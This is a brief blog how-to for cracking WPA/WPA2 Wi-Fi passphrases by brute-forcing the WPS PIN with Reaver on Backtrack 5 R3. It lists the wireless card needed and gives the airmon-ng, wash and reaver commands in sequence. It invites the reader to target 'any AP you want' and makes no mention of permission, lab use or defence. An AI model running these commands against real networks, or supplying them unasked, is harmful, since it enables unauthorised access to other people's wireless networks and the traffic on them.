Cracking WPA / WPA 2 with Reaver (WPS brute forcing attack tool)

Requirements

  • Alfa wireless USB network card model AWUS036NHR (must support packet injection)
  • Make USB bootable Backtrack 5 R3 OS
  •  
Boot up Backtrack 5 R3 from the USB drive and type startx to get into GUI mode

bring up Terminal session and type the following


  • airmon-ng start wlan1 ( which create new virtual wireless interface called mon0)

  • wash -i mon0 ( to find wireless AP that has WPS feature enabled)

Pick any AP you want and run the following command from the terminal session


  • reaver -i mon0 -b<bssid of the AP> -c <channel> -a -L -vv

wait for 2 to 3 hr before reaver guess the target AP Passphrase.


Comments

Popular posts from this blog

DLL Injection:DVTA Walk through

Basic Computer security for Home Users